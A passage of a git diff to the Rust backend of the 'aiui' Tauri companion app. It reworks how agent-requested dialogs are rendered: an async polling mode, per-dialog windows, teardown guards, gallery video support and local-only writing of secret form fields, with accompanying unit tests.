-    // reloading the webview, then re-emitting once. If the second ack also
-    // fails, give up and surface a structured error to the caller instead
-    // of blocking indefinitely on a dialog the user will never see.
-    match tokio::time::timeout(DIALOG_ACK_TIMEOUT, ack_rx).await {
-        Ok(Ok(())) => {
-            trace(&format!("render: ack ok id={}", id));
-        }
-        _ => {
-            trace(&format!(
-                "render: no ack within {:?}; reloading webview and retrying",
-                DIALOG_ACK_TIMEOUT
-            ));
-            // Reset ready flag — after reload the listeners need to
-            // re-register. We'll wait on the handshake again before
-            // re-emitting.
-            if let Some(tx) = state
-                .app
-                .try_state::<std::sync::Arc<tokio::sync::watch::Sender<bool>>>()
-            {
-                let _ = tx.inner().send(false);
-            }
-            reload_main_webview(&state.app);
-            tokio::time::sleep(RELOAD_SETTLE).await;
-
-            // Wait for the freshly-mounted Svelte to signal listeners
-            // are wired up again. Without this the same race that got
-            // us here would just repeat after reload.
-            wait_for_dialog_ready(&state.app, "post-reload").await;
-
-            // After reload the previous ack receiver was consumed. We need a
-            // fresh handshake on the same dialog id — register a new ack
-            // slot tied to the same id is overkill; instead we just re-emit
-            // and wait on the same (already-armed) ack registry by treating
-            // the second emit's resolution as the ack we care about.
-            //
-            // Since `register()` only created one ack channel and we just
-            // consumed its receiver via the timeout, we have to fall back
-            // to a small generic ack via the AckRegistry for the second
-            // round. That keeps DialogState simple.
-            let (probe_id, probe_rx) = state.ui_acks.register();
-            if let Err(e) = state
-                .app
-                .emit_to(crate::DIALOG_WINDOW_LABEL, "ui:ping", &probe_id)
+        let app_for_build = state.app.clone();
+        let id_for_build = id.clone();
+        let title_for_build = window_title;
+        let _ = state.app.run_on_main_thread(move || {
+            if let Err(e) =
+                crate::build_dialog_window(&app_for_build, &id_for_build, size, &title_for_build)
             {
-                trace(&format!("render: post-reload ui:ping emit failed: {e}"));
-                state.ui_acks.forget(&probe_id);
-            }
-            match tokio::time::timeout(DIALOG_ACK_TIMEOUT, probe_rx).await {
-                Ok(Ok(())) => {
-                    trace("render: post-reload webview is responsive, re-emitting dialog:show");
-                    if let Err(e) =
-                        state.app.emit_to(crate::DIALOG_WINDOW_LABEL, "dialog:show", &dr)
-                    {
-                        trace(&format!("render: re-emit FAILED: {e}"));
-                    }
-                }
-                _ => {
-                    state.ui_acks.forget(&probe_id);
-                    trace("render: webview still unreachable after reload — giving up");
-                    state.dialog.cancel(&id);
-                    return (
-                        StatusCode::SERVICE_UNAVAILABLE,
-                        Json(serde_json::json!({
-                            "error": "ui_unreachable",
-                            "detail": "webview did not acknowledge dialog:show after reload",
-                        })),
-                    )
-                        .into_response();
-                }
+                trace(&format!(
+                    "render: build_dialog_window failed id={id_for_build}: {e}"
+                ));
             }
-        }
+        });
     }
 
-    // ── Normal path ─────────────────────────────────────────────────────
-    // Wait for the user's submit/cancel — but bounded by `DIALOG_TTL`. A
-    // dialog that nobody answers eventually returns a structured timeout
-    // instead of blocking the caller indefinitely (#36). The same TTL is
-    // used by the registry's opportunistic sweep, so a timed-out entry
-    // gets cancelled regardless of whether this awaiter or the next
-    // `register()` call notices first.
-    trace(&format!("render: awaiting user response id={}", id));
-    let result = match tokio::time::timeout(DIALOG_TTL, result_rx).await {
-        Ok(Ok(r)) => r,
-        Ok(Err(_)) => crate::dialog::DialogResult {
-            id: id.clone(),
-            cancelled: true,
-            result: serde_json::Value::Null,
-            reason: Some("channel_dropped".into()),
-        },
-        Err(_) => {
-            // TTL expired without user response. Cancel the registry
-            // entry (frees its slot) and fall through to the normal
-            // 200-OK response below with cancelled:true + reason.
-            //
-            // v0.4.45 (Bug #5): previously this returned HTTP 408, which
-            // mcp.rs's render_dialog treated as a non-success status →
-            // generic "aiui tool error: render http 408" — a different
-            // shape than a user-driven cancel (200 {cancelled:true}).
-            // The agent then saw a transport error instead of a clean
-            // "user didn't respond" cancellation. Now both the
-            // user-cancel and the TTL-expiry paths produce the exact
-            // same tool-result shape; only `reason` differs.
-            trace(&format!("render: TTL expired id={}", id));
-            state.dialog.cancel(&id);
-            crate::dialog::DialogResult {
-                id: id.clone(),
-                cancelled: true,
-                result: serde_json::Value::Null,
-                reason: Some("ttl_expired".into()),
-            }
+    // ── Async branch (Step 3) ───────────────────────────────────────────
+    // If the caller opted in (header `x-aiui-async`), hand the dialog off to a
+    // detached task and answer immediately with `{id, ttl_secs}` (202). The
+    // caller polls `GET /render/{id}`. This removes the multi-minute open HTTP
+    // connection that a tunnel/GUI blip turns into a remote ReadError —
+    // resolution now lives in a task, not on the wire.
+    if headers.contains_key(ASYNC_RENDER_HEADER) {
+        // The detached task owns resolution + window teardown from here.
+        guard.disarm();
+        sweep_async_slots(&state);
+        {
+            let mut slots = state.async_slots.lock().unwrap();
+            slots.insert(
+                id.clone(),
+                AsyncSlot { result: None, created_at: Instant::now() },
+            );
         }
-    };
-    trace(&format!(
-        "render: got response id={} cancelled={}",
-        result.id, result.cancelled
-    ));
-
-    // Authoritative teardown (v0.4.46, Bug B): the render has reached a
-    // terminal outcome — user submit/cancel, native X-close, TTL expiry,
-    // or channel-drop. Destroy the dialog window now, from Rust, on the
-    // main thread. This is the single point that guarantees a dialog
-    // window never outlives its dialog: it covers the TTL/channel-drop
-    // paths the frontend's own close never reaches (the empty-window
-    // stranding of 2026-05-29), and is a harmless no-op on the
-    // submit/cancel paths where the window is already gone.
-    {
-        let app_for_destroy = state.app.clone();
-        let _ = state
-            .app
-            .run_on_main_thread(move || crate::destroy_dialog_window(&app_for_destroy));
+        let task_state = state.clone();
+        let task_id = id.clone();
+        tokio::spawn(async move {
+            let result = resolve_dialog(task_state.clone(), task_id.clone(), result_rx).await;
+            if let Some(slot) = task_state.async_slots.lock().unwrap().get_mut(&task_id) {
+                slot.result = Some(result);
+            }
+        });
+        trace(&format!("render: async accepted id={}", id));
+        return (
+            StatusCode::ACCEPTED,
+            Json(serde_json::json!({ "id": id, "ttl_secs": DIALOG_TTL.as_secs() })),
+        )
+            .into_response();
     }
 
+    // ── Synchronous path (legacy, backward-compatible) ──────────────────
+    // No opt-in header → hold the connection until the user answers, exactly
+    // as before. The guard stays armed across the inline await so a dropped
+    // connection still cleans up; `resolve_dialog` runs the terminal teardown.
+    let result = resolve_dialog(state.clone(), id.clone(), result_rx).await;
+    guard.disarm();
+
     // Lifecycle-driven update check (#42): fire once after every
     // successful render. Frontend gates with a 30-min cooldown so this is
     // never noisier than the old 6h timer in active use, and zero load
@@ -810,97 +1052,6 @@ async fn render(
     .into_response()
 }
 
-/// Wait until the dialog window's frontend signals via the
-/// `dialog_window_ready` Tauri command that its `dialog:show` and
-/// `ui:ping` listeners are registered. Times out after
-/// `DIALOG_READY_TIMEOUT` and returns either way — the caller still
-/// emits, falling back to the existing ack/reload contract if the
-/// frontend turns out to be slower than expected.
-///
-/// Called twice in the render path: once before the initial emit
-/// (covers the cold-start race when the window is built fresh), once
-/// after a webview reload (covers the same race after the recovery
-/// path tears down the JS state).
-const DIALOG_READY_TIMEOUT: Duration = Duration::from_millis(3000);
-
-async fn wait_for_dialog_ready(app: &AppHandle, phase: &str) {
-    let Some(tx_state) = app.try_state::<std::sync::Arc<tokio::sync::watch::Sender<bool>>>()
-    else {
-        trace(&format!("render: dialog_ready_tx state missing ({phase})"));
-        return;
-    };
-    let mut rx = tx_state.inner().subscribe();
-    if *rx.borrow() {
-        trace(&format!("render: dialog already ready ({phase})"));
-        return;
-    }
-    let started = std::time::Instant::now();
-    let waited = tokio::time::timeout(DIALOG_READY_TIMEOUT, async {
-        while !*rx.borrow_and_update() {
-            if rx.changed().await.is_err() {
-                break;
-            }
-        }
-    })
-    .await;
-    if waited.is_ok() && *rx.borrow() {
-        trace(&format!(
-            "render: dialog ready ({phase}) after {:?}",
-            started.elapsed()
-        ));
-    } else {
-        trace(&format!(
-            "render: dialog-ready timeout ({phase}) after {:?} — proceeding anyway",
-            started.elapsed()
-        ));
-    }
-}
-
-/// Surface the dialog window for the incoming render. If the window
-/// already exists, show + focus + unminimize + resize to fit this
-/// spec; otherwise build it at the spec-derived inner size.
-/// All Tauri window operations have to run on the main thread, so we
-/// hop there via `run_on_main_thread`.
-fn surface_main_window(app: &AppHandle, id: &str, size: (f64, f64)) {
-    let app_for_show = app.clone();
-    let id_for_log = id.to_string();
-    let rc = app.clone().run_on_main_thread(move || {
-        trace(&format!(
-            "render: main-thread callback id={} size=({:.0},{:.0})",
-            id_for_log, size.0, size.1
-        ));
-        match crate::ensure_dialog_window(&app_for_show, size) {
-            Ok(_win) => {
-                trace("render: main-thread dialog window ready (show/build)");
-            }
-            Err(e) => {
-                trace(&format!("render: main-thread dialog window FAILED: {e}"));
-            }
-        }
-    });
-    trace(&format!("render: run_on_main_thread returned {:?}", rc.is_ok()));
-}
-
-/// Reload the main webview to recover from a stuck JS event loop. Tears
-/// down the JS side (DOM, listeners, setIntervals) and re-runs the Svelte
-/// app from scratch — Tauri's `webview.reload()` is exactly this. We use
-/// it as the recreate path because it's lighter than destroying and
-/// rebuilding the window via `WebviewWindowBuilder` and recovers from the
-/// same class of failure.
-fn reload_main_webview(app: &AppHandle) {
-    let app_for_reload = app.clone();
-    let _ = app.clone().run_on_main_thread(move || {
-        if let Some(win) = app_for_reload.get_webview_window(crate::DIALOG_WINDOW_LABEL) {
-            trace("render: reloading dialog webview");
-            if let Err(e) = win.eval("location.reload()") {
-                trace(&format!("render: reload eval failed: {e}"));
-            }
-        } else {
-            trace("render: reload requested but main window is MISSING");
-        }
-    });
-}
-
 #[cfg(test)]
 mod validate_tests {
     use super::validate_spec;
@@ -936,6 +1087,34 @@ mod validate_tests {
         assert!(err.0.contains("ask|form|confirm"));
     }
 
+    #[test]
+    fn accepts_gallery_with_items() {
+        let spec = json!({"kind":"gallery","items":[
+            {"value":"a","src":"data:image/png;base64,AAAA"},
+            {"value":"b","src":"https://x.test/clip.mp4"}
+        ]});
+        assert!(validate_spec(&spec).is_ok());
+    }
+
+    #[test]
+    fn rejects_gallery_without_items() {
+        let err = validate_spec(&json!({"kind":"gallery"})).unwrap_err();
+        assert!(err.0.contains("items"), "got: {}", err.0);
+    }
+
+    #[test]
+    fn rejects_gallery_empty_items() {
+        let err = validate_spec(&json!({"kind":"gallery","items":[]})).unwrap_err();
+        assert!(err.0.contains("empty"), "got: {}", err.0);
+    }
+
+    #[test]
+    fn rejects_gallery_item_without_value() {
+        let spec = json!({"kind":"gallery","items":[{"src":"data:image/png;base64,AAAA"}]});
+        let err = validate_spec(&spec).unwrap_err();
+        assert!(err.0.contains("value"), "got: {}", err.0);
+    }
+
     #[test]
     fn rejects_missing_top_level_kind() {
         assert!(validate_spec(&json!({"title":"x"})).is_err());
@@ -957,3 +1136,104 @@ mod validate_tests {
         assert!(validate_spec(&spec).is_err());
     }
 }
+
+#[cfg(test)]
+mod render_guard_tests {
+    use super::RenderGuard;
+    use crate::dialog::DialogState;
+    use std::sync::Arc;
+
+    // Regression: the 409-storm + stranded-empty-window pair (2026-05-30).
+    // When the /render handler future is dropped (client give-up) the registry
+    // entry must be freed immediately, not left pending for the 2 h TTL. The
+    // window-destroy half needs a Tauri app, so these cover the registry half
+    // (`app: None`) — the half that produces the 409.
+
+    fn reg(ds: &DialogState) -> (String, tokio::sync::oneshot::Receiver<crate::dialog::DialogResult>) {
+        ds.register_dialog(serde_json::json!({"kind": "confirm"}), None, None, 0)
+    }
+
+    #[test]
+    fn armed_guard_drop_frees_registry_slot() {
+        let ds = Arc::new(DialogState::new());
+        let (id, result_rx) = reg(&ds);
+        assert_eq!(ds.stats().orphan_count, 1);
+        {
+            let _guard = RenderGuard {
+                id: id.clone(),
+                dialog: ds.clone(),
+                app: None,
+                armed: true,
+            };
+            // future "dropped" here
+        }
+        // Slot freed → a later render isn't blocked behind a leaked entry.
+        assert_eq!(ds.stats().orphan_count, 0);
+        // The awaiter observes a cancelled terminal result, not a hang.
+        let r = result_rx.blocking_recv().expect("result_tx sent on cancel");
+        assert!(r.cancelled);
+    }
+
+    #[test]
+    fn disarmed_guard_drop_leaves_terminal_path_untouched() {
+        // The normal terminal path disarms after its own teardown; the guard
+        // must then do nothing (no double-cancel, no spurious slot churn).
+        let ds = Arc::new(DialogState::new());
+        let (id, _result_rx) = reg(&ds);
+        {
+            let mut guard = RenderGuard {
+                id: id.clone(),
+                dialog: ds.clone(),
+                app: None,
+                armed: true,
+            };
+            guard.disarm();
+        }
+        // Entry untouched by the disarmed guard (the real handler's explicit
+        // `complete`/`cancel` owns removal on the terminal path).
+        assert_eq!(ds.stats().orphan_count, 1);
+    }
+}
+
+#[cfg(test)]
+mod async_render_tests {
+    use super::{drain_async_slot, AsyncSlot, SlotLook};
+    use std::collections::HashMap;
+    use std::time::Instant;
+
+    // Step 3: the GET /render/{id} branching — pending → ready (drained once)
+    // → gone — without a Tauri app.
+    #[test]
+    fn slot_lifecycle_pending_ready_gone() {
+        let mut slots: HashMap<String, AsyncSlot> = HashMap::new();
+        slots.insert(
+            "x".into(),
+            AsyncSlot { result: None, created_at: Instant::now() },
+        );
+
+        // Registered, not resolved → Pending.
+        assert!(matches!(drain_async_slot(&mut slots, "x"), SlotLook::Pending));
+        // Unknown id → Gone.
+        assert!(matches!(drain_async_slot(&mut slots, "nope"), SlotLook::Gone));
+
+        // Resolve it.
+        slots.get_mut("x").unwrap().result = Some(crate::dialog::DialogResult {
+            id: "x".into(),
+            cancelled: true,
+            result: serde_json::Value::Null,
+            reason: Some("window_closed".into()),
+        });
+
+        // First drain delivers the terminal result.
+        match drain_async_slot(&mut slots, "x") {
+            SlotLook::Ready(r) => {
+                assert!(r.cancelled);
+                assert_eq!(r.reason.as_deref(), Some("window_closed"));
+            }
+            _ => panic!("expected Ready"),
+        }
+        // Slot was removed → a second drain is Gone (no double-delivery).
+        assert!(matches!(drain_async_slot(&mut slots, "x"), SlotLook::Gone));
+        assert!(slots.is_empty());
+    }
+}
diff --git a/companion/src-tauri/src/imageresolve.rs b/companion/src-tauri/src/imageresolve.rs
index 3ddd259..40ab9e6 100644
--- a/companion/src-tauri/src/imageresolve.rs
+++ b/companion/src-tauri/src/imageresolve.rs
@@ -242,6 +242,12 @@ fn guess_mime_from_extension(path: &Path) -> &'static str {
         Some("ico") => "image/x-icon",
         Some("avif") => "image/avif",
         Some("heic") => "image/heic",
+        // Video — for the gallery widget's `<video controls>`. Small clips
+        // inline as data: here; large ones exceed MAX_IMAGE_BYTES and are
+        // left as-is (the scp/push transfer path handles those).
+        Some("mp4" | "m4v") => "video/mp4",
+        Some("mov") => "video/quicktime",
+        Some("webm") => "video/webm",
         // Unknown extension: hand it to the WebView as octet-stream.
         // It will likely fail to render, but that's a clear "your file
         // isn't an image" signal rather than a misleading mime guess.
@@ -249,6 +255,70 @@ fn guess_mime_from_extension(path: &Path) -> &'static str {
     }
 }
 
+/// True for a local-filesystem path that points at a video by extension.
+/// Used to route video through the push-to-cache `/media` path instead of
+/// the (10 MB-capped, base64-bloating) `data:` inliner. Mirrors the
+/// `isVideo` extension check in `Gallery.svelte` and the Python bridge.
+pub fn is_local_video_path(s: &str) -> bool {
+    if !looks_like_local_path(s) {
+        return false;
+    }
+    let lower = s.to_ascii_lowercase();
+    // Strip any query/fragment a path-ish string might carry before matching.
+    let stem = lower.split(['?', '#']).next().unwrap_or(&lower);
+    stem.ends_with(".mp4")
+        || stem.ends_with(".mov")
+        || stem.ends_with(".m4v")
+        || stem.ends_with(".webm")
+}
+
+/// File extension (lowercase, no dot) of a local video path — for naming the
+/// uploaded cache file. Defaults to `mp4` if somehow absent.
+pub fn video_ext(s: &str) -> String {
+    let lower = s.to_ascii_lowercase();
+    let stem = lower.split(['?', '#']).next().unwrap_or(&lower);
+    stem.rsplit('.').next().filter(|e| !e.is_empty()).unwrap_or("mp4").to_string()
+}
+
+/// Collect every distinct local video path referenced in a `src`/`thumbnail`
+/// slot anywhere in the spec. The bridge uploads each to the Mac's `/media`
+/// endpoint, then calls [`replace_srcs`] to swap the paths for the returned
+/// playback URLs — all *before* [`resolve_local_paths`] runs, so the image
+/// inliner never sees (and never tries to base64 a 200 MB) video.
+pub fn collect_local_video_paths(spec: &Value) -> Vec<String> {
+    let mut found: Vec<String> = Vec::new();
+    walk(spec, &mut |key, value| {
+        if !SRC_KEYS.contains(&key) {
+            return;
+        }
+        if let Some(s) = value.as_str() {
+            if is_local_video_path(s) && !found.iter().any(|f| f == s) {
+                found.push(s.to_string());
+            }
+        }
+    });
+    found
+}
+
+/// Replace every `src`/`thumbnail` string that appears as a key in `map`
+/// with its mapped value. Used to swap uploaded local video paths for their
+/// `/media/blob/...` playback URLs.
+pub fn replace_srcs(spec: &mut Value, map: &std::collections::HashMap<String, String>) {
+    if map.is_empty() {
+        return;
+    }
+    walk_mut(spec, &mut |key, value| {
+        if !SRC_KEYS.contains(&key) {
+            return;
+        }
+        if let Some(s) = value.as_str() {
+            if let Some(url) = map.get(s) {
+                *value = Value::String(url.clone());
+            }
+        }
+    });
+}
+
 fn walk(value: &Value, f: &mut impl FnMut(&str, &Value)) {
     match value {
         Value::Object(map) => {
@@ -330,6 +400,62 @@ mod tests {
     use super::*;
     use serde_json::json;
 
+    #[test]
+    fn is_local_video_path_classifies_correctly() {
+        assert!(is_local_video_path("/Users/me/clip.mp4"));
+        assert!(is_local_video_path("~/Movies/take.MOV"));
+        assert!(is_local_video_path("/tmp/a.webm"));
+        assert!(is_local_video_path("/tmp/a.m4v"));
+        // Not local, or not video.
+        assert!(!is_local_video_path("https://x.test/clip.mp4"));
+        assert!(!is_local_video_path("data:video/mp4;base64,AAAA"));
+        assert!(!is_local_video_path("/Users/me/photo.png"));
+        assert!(!is_local_video_path("relative/clip.mp4"));
+    }
+
+    #[test]
+    fn collect_and_replace_local_videos() {
+        let spec = json!({
+            "kind": "gallery",
+            "items": [
+                {"value": "a", "src": "/Users/me/one.mp4"},
+                {"value": "b", "src": "https://x.test/two.mp4"},
+                {"value": "c", "src": "/Users/me/pic.png"},
+                {"value": "d", "thumbnail": "/Users/me/one.mp4"}
+            ]
+        });
+        let mut found = collect_local_video_paths(&spec);
+        found.sort();
+        // De-duplicated: the same path in two slots appears once.
+        assert_eq!(found, vec!["/Users/me/one.mp4".to_string()]);
+
+        let mut spec = spec;
+        let mut map = std::collections::HashMap::new();
+        map.insert(
+            "/Users/me/one.mp4".to_string(),
+            "http://127.0.0.1:7777/media/blob/x.mp4".to_string(),
+        );
+        replace_srcs(&mut spec, &map);
+        assert_eq!(
+            spec["items"][0]["src"].as_str().unwrap(),
+            "http://127.0.0.1:7777/media/blob/x.mp4"
+        );
+        assert_eq!(
+            spec["items"][3]["thumbnail"].as_str().unwrap(),
+            "http://127.0.0.1:7777/media/blob/x.mp4"
+        );
+        // Untouched: https video and the image.
+        assert_eq!(spec["items"][1]["src"].as_str().unwrap(), "https://x.test/two.mp4");
+        assert_eq!(spec["items"][2]["src"].as_str().unwrap(), "/Users/me/pic.png");
+    }
+
+    #[test]
+    fn video_ext_extracts_lowercase_extension() {
+        assert_eq!(video_ext("/a/b.MP4"), "mp4");
+        assert_eq!(video_ext("~/x.webm"), "webm");
+        assert_eq!(video_ext("/a/take.mov"), "mov");
+    }
+
     #[test]
     fn collects_src_at_any_depth() {
         let spec = json!({
diff --git a/companion/src-tauri/src/lib.rs b/companion/src-tauri/src/lib.rs
index 1558a3a..7d1d3ce 100644
--- a/companion/src-tauri/src/lib.rs
+++ b/companion/src-tauri/src/lib.rs
@@ -5,9 +5,12 @@ mod fsutil;
 mod housekeeping;
 mod http;
 mod imageresolve;
+mod filewrite;
+mod lifecycle_log;
 mod lifetime;
 mod logging;
 mod mcp;
+mod media;
 mod proc_ext;
 mod setup;
 mod skill;
@@ -26,6 +29,37 @@ use tauri::{Emitter, Manager, WebviewUrl, WebviewWindowBuilder};
 pub const SETUP_WINDOW_LABEL: &str = "setup";
 pub const DIALOG_WINDOW_LABEL: &str = "dialog";
 
+/// Timestamp of the most recent dialog-window teardown (X-close, submit/cancel
+/// close, or programmatic destroy). The macOS `RunEvent::Reopen` handler reads
+/// it to suppress the settings window when a Reopen fires merely as a
+/// *side-effect* of a dialog closing (2026-05-31 report: setup window popped up
+/// after closing a dialog) — as opposed to a genuine user reactivation.
+static LAST_DIALOG_TEARDOWN: std::sync::OnceLock<std::sync::Mutex<std::time::Instant>> =
+    std::sync::OnceLock::new();
+
+fn mark_dialog_teardown() {
+    *LAST_DIALOG_TEARDOWN
+        .get_or_init(|| std::sync::Mutex::new(std::time::Instant::now()))
+        .lock()
+        .unwrap() = std::time::Instant::now();
+}
+
+/// Only the macOS `RunEvent::Reopen` handler reads this — every other
+/// platform either has no equivalent event (Windows surfaces a second
+/// instance via tauri-plugin-single-instance instead) or treats reopen
+/// without the dialog-teardown discrimination. Keeping the function
+/// `cfg`-gated avoids a `dead_code` warning under
+/// `clippy --target x86_64-pc-windows-msvc -- -D warnings`. The
+/// matching `mark_dialog_teardown` writer stays cross-platform so the
+/// behaviour is identical if anyone wires a non-macOS reader later.
+#[cfg(target_os = "macos")]
+fn dialog_torn_down_recently() -> bool {
+    LAST_DIALOG_TEARDOWN
+        .get()
+        .map(|m| m.lock().unwrap().elapsed() < std::time::Duration::from_millis(1500))
+        .unwrap_or(false)
+}
+
 #[tauri::command]
 fn dialog_submit(
     state: tauri::State<'_, Arc<dialog::DialogState>>,
@@ -45,16 +79,90 @@ fn dialog_cancel(
     Ok(())
 }
 
-/// Frontend confirms it received the matching `dialog:show` event. The
-/// `/render` handler waits up to 500 ms for this before assuming the WebView
-/// event loop is dead and triggering a recreate.
+/// Issue #135: write the values of `target`-carrying form fields to **local**
+/// files, *before* the dialog result is sent back. The frontend calls this on
+/// affirmative submit **only for a local (native-app) session** with
+/// `{field_name: entered_value}`; for a bridge-served session (`session_origin`
+/// set) the bridge on the agent's host does the local write instead, so this
+/// is never invoked for those. The secret value thus travels WebView → here
+/// (local IPC) → file, and is **never** placed in the `dialog_submit` result
+/// that flows to the bridge/agent.
+///
+/// `target`/mode/path are read authoritatively from the **stored spec** (not
+/// from the frontend) so the destination can't be tampered with after the user
+/// approved it. Returns a per-field outcome map; for a `secret` field the
+/// outcome carries status only, never the value.
 #[tauri::command]
-fn dialog_received(
+fn write_dialog_targets(
     state: tauri::State<'_, Arc<dialog::DialogState>>,
     id: String,
-) -> Result<(), String> {
-    state.ack(&id);
-    Ok(())
+    values: std::collections::HashMap<String, String>,
+) -> Result<std::collections::HashMap<String, filewrite::WriteOutcome>, String> {
+    let req = state
+        .get_request(&id)
+        .ok_or_else(|| "dialog no longer active".to_string())?;
+
+    let mut out = std::collections::HashMap::new();
+    for field in collect_target_fields(&req.spec) {
+        let name = match field.get("name").and_then(|v| v.as_str()) {
+            Some(n) => n.to_string(),
+            None => continue,
+        };
+        let target: filewrite::Target =
+            match serde_json::from_value(field.get("target").cloned().unwrap_or_default()) {
+                Ok(t) => t,
+                Err(e) => {
+                    out.insert(
+                        name,
+                        filewrite::WriteOutcome::invalid(format!("bad target spec: {e}")),
+                    );
+                    continue;
+                }
+            };
+        let value = values.get(&name).map(String::as_str).unwrap_or("");
+        out.insert(name, filewrite::write_local(value, &target));
+    }
+    Ok(out)
+}
+
+/// Collect every form field that carries a non-null `target`, walking both the
+/// flat `fields` array and any `tabs[].fields`.
+fn collect_target_fields(spec: &serde_json::Value) -> Vec<serde_json::Value> {
+    let mut out = Vec::new();
+    let mut consider = |fields: &serde_json::Value| {
+        if let Some(arr) = fields.as_array() {
+            for f in arr {
+                if f.get("target").map(|t| !t.is_null()).unwrap_or(false) {
+                    out.push(f.clone());
+                }
+            }
+        }
+    };
+    if let Some(fields) = spec.get("fields") {
+        consider(fields);
+    }
+    if let Some(tabs) = spec.get("tabs").and_then(|v| v.as_array()) {
+        for t in tabs {
+            if let Some(fields) = t.get("fields") {
+                consider(fields);
+            }
+        }
+    }
+    out
+}
+
+/// Multi-window pull model (Step 4): the per-id dialog window fetches its own
+/// render payload on mount, keyed by its window label (= the dialog id). This
+/// replaces the old `dialog:show` emit + `dialog_window_ready` ack handshake —
+/// the frontend initiates, so there is no event-before-listener race to guard.
+/// Returns `None` if the dialog is already gone (resolved/evicted), and the
+/// window closes itself.
+#[tauri::command]
+fn get_dialog_spec(
+    state: tauri::State<'_, Arc<dialog::DialogState>>,
+    id: String,
+) -> Result<Option<dialog::DialogRequest>, String> {
+    Ok(state.get_request(&id))
 }
 
 /// Frontend response to a `ui:ping` event from `/health`. Same shape as
@@ -68,19 +176,30 @@ fn ui_pong(
     Ok(())
 }
 
-/// Frontend signals that the dialog window is mounted and its
-/// `dialog:show` / `ui:ping` listeners are registered. The render
-/// path on the Rust side waits on this watch *before* emitting, so
-/// a freshly-built dialog window never receives a `dialog:show`
-/// event before the listener is up. Without this handshake we hit
-/// the 500 ms ack timeout, reload the WebView, and lose the user's
-/// dialog (the failure mode reported on 2026-05-03).
-#[tauri::command]
-fn dialog_window_ready(
-    tx: tauri::State<'_, Arc<tokio::sync::watch::Sender<bool>>>,
-) -> Result<(), String> {
-    let _ = tx.send(true);
-    Ok(())
+/// A dialog window's label IS its dialog id (Step 4 multi-window): any window
+/// that isn't the setup window is a dialog window. There is no longer a single
+/// reused `DIALOG_WINDOW_LABEL` window.
+fn is_dialog_window_label(label: &str) -> bool {
+    label != SETUP_WINDOW_LABEL
+}
+
+/// macOS: drop back to Accessory (no Dock icon) once no dialog window remains
+/// open *other than* `except` (the one currently being torn down — `destroy()`
+/// may not have removed it from the window list yet) and the setup window is
+/// hidden. Matches the Regular-mode promote in `build_dialog_window`.
+#[cfg(target_os = "macos")]
+fn demote_if_no_dialogs_except(app: &tauri::AppHandle, except: &str) {
+    let setup_open = app
+        .get_webview_window(SETUP_WINDOW_LABEL)
+        .and_then(|w| w.is_visible().ok())
+        .unwrap_or(false);
+    let other_dialog_open = app
+        .webview_windows()
+        .keys()
+        .any(|l| is_dialog_window_label(l) && l != except);
+    if !other_dialog_open && !setup_open {
+        let _ = app.set_activation_policy(tauri::ActivationPolicy::Accessory);
+    }
 }
 
 #[tauri::command]
@@ -99,72 +218,63 @@ async fn close_window(window: tauri::WebviewWindow) -> Result<(), String> {
     let _ = window.close();
     log::debug!("[aiui] close_window: closed {label}");
 
-    // If that was the dialog window and no setup window is open,
-    // demote the app back to Accessory mode so we don't permanently
-    // grow a Dock icon. `ensure_dialog_window` promotes us to Regular
+    // If a dialog window just closed and nothing else needs the Dock icon,
+    // demote back to Accessory. `build_dialog_window` promoted us to Regular
     // for the dialog's lifetime; this is the matching demote.
-    #[cfg(target_os = "macos")]
-    if label == DIALOG_WINDOW_LABEL {
-        let setup_open = app
-            .get_webview_window(SETUP_WINDOW_LABEL)
-            .and_then(|w| w.is_visible().ok())
-            .unwrap_or(false);
-        if !setup_open {
-            let _ = app.set_activation_policy(tauri::ActivationPolicy::Accessory);
-        }
+    if is_dialog_window_label(&label) {
+        mark_dialog_teardown();
+        #[cfg(target_os = "macos")]
+        demote_if_no_dialogs_except(&app, &label);
     }
     Ok(())
 }
 
-/// Authoritatively tear down the dialog window from the Rust side
-/// (v0.4.46, Bug B). Uses `destroy()` (immediate) rather than `close()`
-/// so it bypasses the `CloseRequested` → frontend round-trip that could
-/// strand an empty window when the WebView's handler failed to complete
-/// the close. This is the single teardown point for the dialog window:
-/// the `/render` handler calls it once a render reaches *any* terminal
-/// outcome (submit, cancel, X-close, TTL, channel-drop), so the window
-/// can never outlive the dialog it was showing. Idempotent — a no-op
-/// when the window is already gone.
-pub(crate) fn destroy_dialog_window(app: &tauri::AppHandle) {
-    if let Some(win) = app.get_webview_window(DIALOG_WINDOW_LABEL) {
+/// Authoritatively tear down the dialog window with label `id` from the Rust
+/// side (v0.4.46, Bug B; Step 4: now per-id). Uses `destroy()` (immediate)
+/// rather than `close()` so it bypasses the `CloseRequested` → frontend
+/// round-trip that could strand an empty window. The `/render` handler calls
+/// it once that render reaches *any* terminal outcome (submit, cancel,
+/// X-close, TTL, channel-drop), so a window can never outlive the dialog it
+/// was showing. Idempotent — a no-op when the window is already gone.
+pub(crate) fn destroy_dialog_window(app: &tauri::AppHandle, id: &str) {
+    if let Some(win) = app.get_webview_window(id) {
         let _ = win.destroy();
     }
-    // Matching demote for `ensure_dialog_window`'s Regular-mode promote:
-    // drop back to Accessory once the dialog is gone, unless the setup
-    // window is still up.
+    mark_dialog_teardown();
+    // Matching demote for `build_dialog_window`'s Regular-mode promote: drop
+    // back to Accessory once the last dialog is gone (ignoring the one we just
+    // destroyed, which may still be in the window list) and setup is hidden.
     #[cfg(target_os = "macos")]
-    {
-        let setup_open = app
-            .get_webview_window(SETUP_WINDOW_LABEL)
-            .and_then(|w| w.is_visible().ok())
-            .unwrap_or(false);
-        if !setup_open {
-            let _ = app.set_activation_policy(tauri::ActivationPolicy::Accessory);
-        }
-    }
+    demote_if_no_dialogs_except(app, id);
 }
 
-/// Belt-and-suspenders invariant (v0.4.46, Bug B+): a dialog window may
-/// only exist while a dialog is pending in the registry. If a window is
-/// found with an empty registry, it's a stranded empty window — destroy
-/// it. Cheap (one mutex read + a window lookup); called on app
-/// re-activation, exactly when a user would otherwise notice a leftover
-/// empty frame.
+/// Belt-and-suspenders invariant (v0.4.46, Bug B+; Step 4: per-id): a dialog
+/// window may only exist while its dialog is pending in the registry. Any
+/// dialog-labelled window whose id is no longer registered is a stranded
+/// empty window — destroy it. Called on app re-activation, exactly when a
+/// user would otherwise notice a leftover empty frame.
 ///
-/// Currently wired only to macOS `RunEvent::Reopen`; other platforms
-/// have no trigger yet (Windows surfaces the existing window via the
-/// single-instance plugin), so allow it to be unused there instead of
-/// `#[cfg]`-gating the whole fn — keeps it ready for a future Windows
-/// hook without tripping CI's `-D warnings` dead-code check.
